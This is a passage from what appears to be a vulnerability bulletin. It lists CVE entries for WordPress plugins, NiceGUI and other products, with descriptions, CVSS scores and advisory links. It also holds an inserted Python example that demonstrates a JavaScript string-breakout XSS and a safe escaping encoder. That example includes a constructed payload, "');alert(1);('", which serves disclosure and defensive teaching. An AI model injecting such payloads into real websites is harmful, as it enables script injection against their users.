| wpcommerz--twinklesmtp Email Service Provider For WordPress | The twinklesmtp - Email Service Provider For WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sender settings in all versions up to, and including, 1.03 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-01-07 | 4.4 | CVE-2025-14887 | https://www.wordfence.com/threat-intel/vulnerabilities/id/223d62cc-61ee-4818-9521-a772c1d57d59?source=cve https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L32 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L46 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L50 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L84 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L88 https://plugins.trac.wordpress.org/browser/twinklesmtp/tags/1.0.3/backend/templates/views/settings/sender/default.php#L36 |
| wpdevart--Countdown Timer Widget Countdown | The Countdown Timer - Widget Countdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdevart_countdown' shortcode in all versions up to, and including, 2.7.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-14555 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ee84c720-7997-4c09-a2f9-5e1a28bd1100?source=cve https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L167 https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L48 https://plugins.trac.wordpress.org/browser/widget-countdown/trunk/includes/front_end.php#L30 https://plugins.trac.wordpress.org/changeset/3425959/ |
| wpdevelop--Booking Calendar | The Booking Calendar plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 10.14.10 via the `WPBC_FLEXTIMELINE_NAV` AJAX action. This is due to the nonce verification being conditionally disabled by default (`booking_is_nonce_at_front_end` option is `'Off'` by default). When the `booking_is_show_popover_in_timeline_front_end` option is enabled (which is the default in demo installations and can be enabled by administrators), it is possible for unauthenticated attackers to extract sensitive booking data including customer names, email addresses, phone numbers, and booking details. | 2026-01-09 | 5.3 | CVE-2025-14146 | https://www.wordfence.com/threat-intel/vulnerabilities/id/281a1c0e-bbd8-4cf6-94ca-b888c7d7e3af?source=cve https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/lib/wpbc-ajax.php#L29 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/includes/_functions/nonce_func.php#L33 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/wpbc-activation.php#L572 https://plugins.trac.wordpress.org/browser/booking/tags/10.14.8/core/timeline/v2/wpbc-class-timeline_v2.php#L3187 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3434934%40booking%2Ftrunk&old=3432649%40booking%2Ftrunk&sfp_email=&sfph_mail=#file2 |
| wpdevteam--BetterDocs Knowledge Base Documentation & FAQ Solution for Elementor & Block Editor | The BetterDocs plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.3 via the scripts() function. This makes it possible for authenticated attackers, with contributor-level access and above, to extract sensitive data including the OpenAI API key stored in plugin settings. | 2026-01-09 | 6.5 | CVE-2025-14980 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1595f231-d300-484a-a0e1-1e2bc7b82ed3?source=cve https://research.cleantalk.org/cve-2025-14980/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3430424%40betterdocs%2Ftags%2F4.3.4&old=3422660%40betterdocs%2Ftrunk |
| wpdevteam--Templately Elementor & Gutenberg Template Library: 6500+ Free & Pro Ready Templates And Cloud! | The Templately plugin for WordPress is vulnerable to Arbitrary File Write in all versions up to, and including, 3.4.8. This is due to inadequate input validation in the `save_template_to_file()` function where user-controlled parameters like `session_id`, `content_id`, and `ai_page_ids` are used to construct file paths without proper sanitization. This makes it possible for unauthenticated attackers to write arbitrary `.ai.json` files to locations within the uploads directory. | 2026-01-10 | 5.3 | CVE-2026-0831 | https://www.wordfence.com/threat-intel/vulnerabilities/id/778242f4-5dfa-4d72-a032-8b5521c5b8ce?source=cve https://plugins.trac.wordpress.org/browser/templately/tags/3.4.5/includes/Core/Importer/Utils/AIUtils.php#L414 https://plugins.trac.wordpress.org/browser/templately/tags/3.4.5/includes/API/AIContent.php#L38 https://plugins.trac.wordpress.org/changeset/3426051/ |
| wpeverest--User Registration & Membership Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin | The User Registration & Membership - Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.4.8. This is due to missing or incorrect nonce validation on the 'process_row_actions' function with the 'delete' action. This makes it possible for unauthenticated attackers to delete arbitrary posts via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-10 | 5.4 | CVE-2025-14976 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e5495b4c-a1ac-4860-83a7-686d9436d983?source=cve https://plugins.trac.wordpress.org/browser/user-registration/tags/4.4.8/includes/abstracts/abstract-ur-list-table.php#L290 https://plugins.trac.wordpress.org/changeset/3435099/user-registration |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms - Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.49.1 via the 'listen_for_csv_export' function. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with access to the Forminator dashboard, to export sensitive form submission data including personally identifiable information. | 2026-01-09 | 5.3 | CVE-2025-14782 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2b28ddeb-44f5-4d19-b866-94fc2088ee6d?source=cve https://plugins.trac.wordpress.org/changeset/3423003/forminator/trunk/library/class-export.php |
| WPShop.ru--AdsPlace'r Ad Manager, Inserter, AdSense Ads | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPShop.Ru AdsPlace'r - Ad Manager, Inserter, AdSense Ads allows DOM-Based XSS. This issue affects AdsPlace'r - Ad Manager, Inserter, AdSense Ads: from n/a through 1.1.5. | 2026-01-06 | 6.5 | CVE-2024-31088 | https://patchstack.com/database/wordpress/plugin/adsplacer/vulnerability/wordpress-adsplace-r-ad-manager-inserter-adsense-ads-plugin-1-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| wptb--WP Table Builder Drag & Drop Table Builder | The WP Table Builder - Drag & Drop Table Builder plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect authorization check on the save_table() function in all versions up to, and including, 2.0.19. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new wptb-table posts. | 2026-01-09 | 4.3 | CVE-2025-13753 | https://www.wordfence.com/threat-intel/vulnerabilities/id/95f49080-2263-4f6d-9372-30137efd8e10?source=cve https://plugins.trac.wordpress.org/changeset/3432381/wp-table-builder |
| Wptexture--Image Slider Slideshow | Authorization Bypass Through User-Controlled Key vulnerability in Wptexture Image Slider Slideshow allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Slider Slideshow: from n/a through 1.8. | 2026-01-08 | 4.3 | CVE-2026-22489 | https://patchstack.com/database/wordpress/plugin/image-slider-slideshow/vulnerability/wordpress-image-slider-slideshow-plugin-1-8-insecure-direct-object-references-idor-vulnerability?_s_id=cve |
| WPvibes--AnyWhere Elementor Pro | Missing Authorization vulnerability in WPvibes AnyWhere Elementor Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AnyWhere Elementor Pro: from n/a through 2.29. | 2026-01-05 | 4.3 | CVE-2025-31046 | https://vdp.patchstack.com/database/wordpress/theme/anywhere-elementor-pro/vulnerability/wordpress-anywhere-elementor-pro-2-29-broken-access-control-vulnerability?_s_id=cve |
| wpvibes--Form Vibes Database Manager for Forms | The Form Vibes - Database Manager for Forms plugin for WordPress is vulnerable to SQL Injection via the 'params' parameter in all versions up to, and including, 1.4.13 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-01-06 | 4.9 | CVE-2025-13409 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28eb6998-be54-4cf9-8bb1-454c07151748?source=cve https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L62 https://plugins.trac.wordpress.org/browser/form-vibes/tags/1.4.13/inc/modules/analytics/module.php#L51 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3425061%40form-vibes&new=3425061%40form-vibes&sfp_email=&sfph_mail= |
| www15to--QR Code for WooCommerce order emails, PDF invoices, packing slips | The QR Code for WooCommerce order emails, PDF invoices, packing slips plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode in all versions up to, and including, 1.9.42 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-14626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2e599c-48de-4d3a-94a3-b98badfb7a98?source=cve https://plugins.trac.wordpress.org/browser/qr-code-tag-for-wc-from-goaskle-com/tags/1.9.42/lib/qrct/QrctWp.php#L1661 https://plugins.trac.wordpress.org/browser/qr-code-tag-for-wc-from-goaskle-com/trunk/lib/qrct/QrctWp.php#L1661 |
| xagio--Xagio SEO AI Powered SEO | The Xagio SEO - AI Powered SEO plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.1.0.30 via the 'pixabayDownloadImage' function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. | 2026-01-06 | 6.4 | CVE-2025-14438 | https://www.wordfence.com/threat-intel/vulnerabilities/id/72779dd2-04eb-445d-88a0-28a9c4d2369b?source=cve https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/inc/xagio_core.php#L236 https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/modules/seo/models/xagio_tinymce.php#L91 https://plugins.trac.wordpress.org/browser/xagio-seo/tags/7.1.0.29/modules/seo/models/xagio_tinymce.php#L135 https://plugins.trac.wordpress.org/changeset/3426300/xagio-seo#file374 |
| xwiki-contrib--macro-fullcalendar | XWiki Full Calendar Macro displays objects from the wiki on the calendar. Prior to version 2.4.6, users with the rights to view the Calendar.JSONService page (including guest users) can exploit the data leak vulnerability by accessing database info, with the exception of passwords. This issue has been patched in version 2.4.6. | 2026-01-10 | 5.3 | CVE-2025-65090 | https://github.com/xwiki-contrib/macro-fullcalendar/security/advisories/GHSA-637h-ch24-xp9m https://github.com/xwiki-contrib/macro-fullcalendar/commit/25bc14c181c9a92f493b20ac264388c7ba171884 https://jira.xwiki.org/browse/FULLCAL-82 |
| Yahei.Net--Yahei-PHP Prober | Yahei-PHP Prober 0.4.7 contains a remote HTML injection vulnerability that allows attackers to execute arbitrary HTML code through the 'speed' GET parameter. Attackers can inject malicious HTML code in the 'speed' parameter of prober.php to trigger cross-site scripting in user browser sessions. | 2026-01-07 | 6.1 | CVE-2019-25280 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Archived Yahei-PHP Product Homepage |
| Yerootech--iDS6 DSSPro Digital Signage System | iDS6 DSSPro Digital Signage System 6.2 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without request validation. Attackers can craft malicious web pages to trick logged-in administrators into adding unauthorized users by exploiting the lack of CSRF protections. | 2026-01-06 | 4.3 | CVE-2020-36918 | ExploitDB-48990 Zero Science Lab Disclosure (ZSL-2020-5606) Archived Yeroo Tech Vendor Homepage Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry VulnCheck Advisory: iDS6 DSSPro Digital Signage System 6.2 Cross-Site Request Forgery via User Management |
| zanderz--Recras | The Recras plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'recrasname' shortcode attribute in all versions up to, and including, 6.4.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13497 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ef93491a-5965-4289-b72c-d1568ff4e6e8?source=cve https://plugins.trac.wordpress.org/browser/recras/trunk/src/OnlineBooking.php#L144 https://plugins.trac.wordpress.org/browser/recras/tags/6.4.1/src/OnlineBooking.php#L144 https://plugins.trac.wordpress.org/changeset/3432851/ |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.13.0 to 3.4.1, there is an XSS risk in NiceGUI when developers pass attacker-controlled strings into ui.navigate.history.push() or ui.navigate.history.replace(). These helpers are documented as History API wrappers for updating the browser URL without a page reload. However, if the URL argument is embedded into generated JavaScript without proper escaping, a crafted payload can break out of the intended string context and execute arbitrary JavaScript in the victim's browser. Applications that do not pass untrusted input into ui.navigate.history.push/replace are not affected. This issue has been patched in version 3.5.0. | 2026-01-08 | 6.1 | CVE-2026-21871 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-7grm-h62g-5m97 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions 2.22.0 to 3.4.1, an unsafe implementation in the click event listener used by ui.sub_pages, combined with attacker-controlled link rendering on the page, causes XSS when the user actively clicks on the link. This issue has been patched in version 3.5.0. | 2026-01-08 | 6.1 | CVE-2026-21872 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-m7j5-rq9j-6jj9 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| zauberzeug--nicegui | NiceGUI is a Python-based UI framework. From versions v2.10.0 to 3.4.1, an unauthenticated attacker can exhaust Redis connections by repeatedly opening and closing browser tabs on any NiceGUI application using Redis-backed storage. Connections are never released, leading to service degradation when Redis hits its connection limit. NiceGUI continues accepting new connections - errors are logged but the app stays up with broken storage functionality. This issue has been patched in version 3.5.0. | 2026-01-08 | 5.3 | CVE-2026-21874 | https://github.com/zauberzeug/nicegui/security/advisories/GHSA-mp55-g7pj-rvm2 https://github.com/zauberzeug/nicegui/commit/6c52eb2c90c4b67387c025b29646b4bc1578eb83 https://github.com/zauberzeug/nicegui/releases/tag/v3.5.0 |
| ZTE--MF258K | There is a configuration defect vulnerability in the version server of ZTE MF258K Pro products. Due to improper directory permission settings, an attacker can obtain write access to a specific directory. | 2026-01-09 | 4.3 | CVE-2025-66315 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/4891644183717871638 |
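
The NiceGUI history.push/replace entry above describes the classic string-context breakout: attacker data interpolated into generated JavaScript closes the string literal early and the remainder runs as code. The following is an added example written for this bulletin, not NiceGUI's own code; the shape of the generated statement (a `history.pushState` call built from a Python string) and the payload are assumed for the demonstration. It contrasts raw interpolation with a JSON-based JavaScript string literal encoder and uses a small scanner to show whether the interpolated data stayed inside its literal.

```python
"""Illustrative example for this bulletin (not NiceGUI's code): escaping
attacker-controlled data that is embedded in generated JavaScript."""
import json


def render_unsafe(url: str) -> str:
    """Interpolates url straight into a single-quoted JS string literal.
    A quote inside url closes the literal early and the remainder of url
    runs as code in the page. Assumed statement shape, not NiceGUI's."""
    return f"window.history.pushState(null, '', '{url}');"


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that is safe to embed in
    generated script. json.dumps escapes quotes, backslashes and control
    characters, and with ensure_ascii=True also U+2028/U+2029 (line
    terminators in JS); the extra replacements keep '</script>' from closing
    an inline <script> element. \\uXXXX escapes are valid in JSON and JS."""
    return (json.dumps(value, ensure_ascii=True)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_safe(url: str) -> str:
    """Same statement, with url passed through js_string_literal."""
    return f'window.history.pushState(null, "", {js_string_literal(url)});'


def roundtrip(value: str) -> bool:
    """The literal must decode back to the original value (json.loads reads
    \\uXXXX escapes the same way a JS engine does)."""
    return json.loads(js_string_literal(value)) == value


def top_level_statements(js: str) -> int:
    """Count ';' outside of string literals in a JS snippet. A minimal
    scanner (no comments, template or regex literals) that is enough to
    show whether interpolated data stayed inside its string."""
    count, quote, i = 0, None, 0
    while i < len(js):
        c = js[i]
        if quote:
            if c == "\\":
                i += 1              # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == ";":
            count += 1
        i += 1
    return count


# Constructed attacker-controlled value: closes the literal, runs alert(1),
# then reopens a literal so the whole statement still parses.
PAYLOAD = "');alert(1);('"


if __name__ == "__main__":
    for label, js in (("unsafe", render_unsafe(PAYLOAD)),
                      ("safe", render_safe(PAYLOAD))):
        print(f"{label}: {top_level_statements(js)} statement(s): {js}")
```

With the constructed payload the unsafe rendering yields three top-level statements (the pushState call, `alert(1)`, and a dangling call), while the safe rendering stays a single statement whose argument decodes back to the original value. The same encoder applies to any server-generated script, not only URL updates.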
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| AcademySoftwareFoundation--OpenColorIO | A vulnerability was found in AcademySoftwareFoundation OpenColorIO up to 2.5.0. This issue affects the function ConvertToRegularExpression of the file src/OpenColorIO/FileRules.cpp. Manipulation of its input results in an out-of-bounds read. The attack requires local access. The exploit has been made public and could be used. The patch is named ebdbb75123c9d5f4643e041314e2bc988a13f20d. To fix this issue, it is recommended to deploy a patch. The fix was added to the 2.5.1 milestone. | 2026-01-11 | 3.3 | CVE-2025-15506 | VDB-340444 \| AcademySoftwareFoundation OpenColorIO FileRules.cpp ConvertToRegularExpression out-of-bounds VDB-340444 \| CTI Indicators (IOB, IOC, IOA) Submit #733332 \| AcademySoftwareFoundation OpenColorIO 1d77ecd Out-of-Bounds Read https://github.com/AcademySoftwareFoundation/OpenColorIO/issues/2228 https://github.com/AcademySoftwareFoundation/OpenColorIO/pull/2231 https://github.com/oneafter/1225/blob/main/uaf https://github.com/cozdas/OpenColorIO/commit/ebdbb75123c9d5f4643e041314e2bc988a13f20d https://github.com/AcademySoftwareFoundation/OpenColorIO/milestone/11 |
| aws--aws-sdk-net | AWS SDK for .NET works with Amazon Web Services to help build scalable solutions with Amazon S3, Amazon DynamoDB, Amazon Glacier, and more. From versions 4.0.0 to before 4.0.3.3, Customer applications could be configured to improperly route AWS API calls to non-existent or non-AWS hosts. This notification is related to the use of specific values for the region input field when calling AWS services. An actor with access to the environment in which the SDK is used could set the region input field to an invalid value. This issue has been patched in version 4.0.3.3. | 2026-01-10 | 3.7 | CVE-2026-22611 | https://github.com/aws/aws-sdk-net/security/advisories/GHSA-9cvc-h2w8-phrp |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain a Heap-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service. | 2026-01-09 | 2.3 | CVE-2025-46643 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| Dell--PowerProtect Data Domain with Data Domain Operating System (DD OS) Feature Release | Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS2023 release versions 7.10.1.0 through 7.10.1.70, contain an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure. | 2026-01-09 | 2.7 | CVE-2025-46676 | https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 10.3 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed a user to leak certain information by referencing specially crafted images that bypass asset proxy protection. | 2026-01-09 | 3.5 | CVE-2025-3950 | GitLab Issue #537697 HackerOne Bug Bounty Report #3106477 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| HCLSoftware--BigFix IVR | Insufficient session expiration in the Web UI authentication component in HCL BigFix IVR version 4.2 allows an authenticated attacker to gain prolonged unauthorized access to protected API endpoints due to excessive expiration periods. | 2026-01-07 | 2 | CVE-2025-31962 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| HCLSoftware--BigFix IVR | Improper authentication and missing CSRF protection in the local setup interface component in HCL BigFix IVR version 4.2 allows a local attacker to perform unauthorized configuration changes via unauthenticated administrative configuration requests. | 2026-01-07 | 2.9 | CVE-2025-31963 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| HCLSoftware--BigFix IVR | Improper service binding configuration in internal service components in HCL BigFix IVR version 4.2 allows a privileged attacker to impact service availability via exposure of administrative services bound to external network interfaces instead of the local authentication interface. | 2026-01-07 | 2.2 | CVE-2025-31964 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below contain a memory leak vulnerability in its XML MPE Parsing Path (iccFromXml). This issue is fixed in version 2.3.1.1. | 2026-01-06 | 3.3 | CVE-2026-21674 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xww6-v3vg-4qc7 https://github.com/InternationalColorConsortium/iccDEV/issues/241 https://github.com/InternationalColorConsortium/iccDEV/commit/d7028d8f558bb681efe2b85f02eb4ca374502cbb |
| lief-project--LIEF | A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. Manipulation of the parsed input results in a null pointer dereference. The attack requires local access. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 resolves this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component. | 2026-01-10 | 3.3 | CVE-2025-15504 | VDB-340375 \| lief-project LIEF ELF Binary Parser.tcc parse_binary null pointer dereference VDB-340375 \| CTI Indicators (IOB, IOC, IOA) Submit #733329 \| lief-project LIEF 9698ea6 Memory Corruption https://github.com/lief-project/LIEF/issues/1277 https://github.com/lief-project/LIEF/issues/1277#issuecomment-3693859001 https://github.com/oneafter/1210/blob/main/segv1 https://github.com/lief-project/LIEF/commit/81bd5d7ea0c390563f1c4c017c9019d154802978 https://github.com/lief-project/LIEF/releases/tag/0.17.2 |
| Luxul--XWR-600 | A vulnerability was found in Luxul XWR-600 up to 4.0.1. The affected element is an unknown function of the component Web Administration Interface. The manipulation of the argument Guest Network/Wireless Profile SSID results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond with a technical statement. | 2026-01-11 | 2.4 | CVE-2025-15505 | VDB-340435 \| Luxul XWR-600 Web Administration cross site scripting VDB-340435 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #727924 \| Luxul XWR-600 Router Firmware Ver: 4.0.1 Cross Site Scripting https://docs.google.com/document/d/1S2f5lT0b-KE9m6xq8BY6eSixv6SgsGL1e8QQzeOkq5c/ |
| opf--openproject | OpenProject is an open-source, web-based project management software. Prior to version 16.6.2, a low privileged logged-in user can view the full names of other users. Since user IDs are assigned sequentially and predictably (e.g., 1 to 1000), an attacker can extract a complete list of all users' full names by iterating over user IDs in the corresponding URLs. The same behavior can also be reproduced via the OpenProject API, allowing automated retrieval of full names through the API as well. This issue has been patched in version 16.6.2. Those who are unable to upgrade may apply the patch manually. | 2026-01-10 | 3.5 | CVE-2026-22602 | https://github.com/opf/openproject/security/advisories/GHSA-7fvx-9h6h-g82j https://github.com/opf/openproject/pull/21281 https://github.com/opf/openproject/commit/fb39a779f521d9b08f1e0c9e8aff2b6d4643ea37 https://github.com/opf/openproject/releases/tag/v16.6.2 |
| Palantir--com.palantir.acme:gotham-default-apps-bundle | On October 1, 2025, Palantir discovered that images uploaded through the Dossier front-end app were not being marked correctly with the proper security levels. The regression was traced back to a change in May 2025, which was meant to allow file uploads to be shared among different artifacts (e.g. other dossiers and presentations). On deployments configured with CBAC, the front-end would present a security picker dialog to set the security level on the uploads, thereby mitigating the issue. On deployments without a CBAC configuration, no security picker dialog appears, leading to a security level of CUSTOM with no markings or datasets selected. The resulting markings and groups for the file uploads thus will be only those added by the "Default authorization rules" defined in the Auth Chooser configuration. On most environments, it is expected that the "Default authorization rules" only add the Everyone group. | 2026-01-09 | 3.5 | CVE-2025-62487 | https://palantir.safebase.us/?tcuUid=c91a1b4f-72e7-4959-9e2d-3a341e5c7a1f |
| PHPGurukul--Staff Leave Management System | A flaw has been found in PHPGurukul Staff Leave Management System 1.0. The affected element is the function ADD_STAFF/UPDATE_STAFF of the file /staffleave/slms/slms/adminviews.py of the component SVG File Handler. Executing a manipulation of the argument profile_pic can lead to cross site scripting. The attack can be executed remotely. The exploit has been published and may be used. | 2026-01-08 | 2.4 | CVE-2026-0730 | VDB-340127 \| PHPGurukul Staff Leave Management System SVG File adminviews.py UPDATE_STAFF cross site scripting VDB-340127 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #733160 \| PHPGurukul Staff Leave Management System v1.0 Cross Site Scripting https://github.com/rsecroot/Staff-Leave-Management-System/blob/main/Cross%20Site%20Scripting.md https://phpgurukul.com/ |
| Progress--MOVEit Transfer | Unverified Password Change vulnerability in Progress MOVEit Transfer on Windows (REST API modules). This issue affects MOVEit Transfer: from 2023.1.0 before 2023.1.3, from 2023.0.0 before 2023.0.8, from 2022.1.0 before 2022.1.11, from 2022.0.0 before 2022.0.10. | 2026-01-06 | 3.7 | CVE-2025-11235 | https://docs.progress.com/bundle/moveit-transfer-release-notes-2023_1/page/Fixed-Issues-in-2023.1.3.html |
| projectworlds--House Rental and Property Listing | A vulnerability was detected in projectworlds House Rental and Property Listing 1.0. This issue affects some unknown processing of the file /app/complaint.php. The manipulation of the argument Name results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. | 2026-01-06 | 2.4 | CVE-2026-0642 | VDB-339685 \| projectworlds House Rental and Property Listing complaint.php cross site scripting VDB-339685 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #732369 \| projectworlds.com House rental And Property Listing 1.0 Cross Site Scripting https://github.com/Pick-program/CVE/issues/4 |
| questdb--ui | A security flaw has been discovered in questdb ui up to 1.11.9. Impacted is an unknown function of the component Web Console. The manipulation results in cross site scripting. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.1.10 is recommended to address this issue. The patch is identified as b42fd9f18476d844ae181a10a249e003dafb823d. You should upgrade the affected component. The vendor confirmed early that the fix "is going to be released as a part of QuestDB 9.3.0" as well. | 2026-01-10 | 3.5 | CVE-2026-0824 | VDB-340357 \| questdb ui Web Console cross site scripting VDB-340357 \| CTI Indicators (IOB, IOC, TTP) Submit #733253 \| questdb V9.2.3(latest) xss https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md https://github.com/questdb/questdb/releases/tag/9.3.0 https://github.com/questdb/ui/pull/519#issue-3790862030 https://github.com/questdb/ui/commit/b42fd9f18476d844ae181a10a249e003dafb823d https://github.com/questdb/ui/pull/518 |
| rankology--Rankology SEO and Analytics Tool | The Rankology SEO and Analytics Tool plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the 'rankology_code_block' page in all versions up to, and including, 2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to add header and footer code blocks. | 2026-01-07 | 2.7 | CVE-2025-12958 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c97a341c-23f5-49a9-ad05-1fb387047e3b?source=cve https://wordpress.org/plugins/rankology-seo-and-analytics-tool/ |
| SourceCodester--API Key Manager App | A vulnerability was found in SourceCodester API Key Manager App 1.0. Affected by this vulnerability is an unknown functionality of the component Import Key Handler. Performing a manipulation results in cross site scripting. The attack can be initiated remotely. | 2026-01-05 | 3.5 | CVE-2026-0580 | VDB-339472 \| SourceCodester API Key Manager App Import Key cross site scripting VDB-339472 \| CTI Indicators (IOB, IOC, TTP) Submit #731146 \| SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Cross Site Scripting Submit #731290 \| SourceCodester API Key Manager App Using HTML, CSS and JavaScript with Source Code 0 Basic Cross Site Scripting (Duplicate) https://www.sourcecodester.com/ |
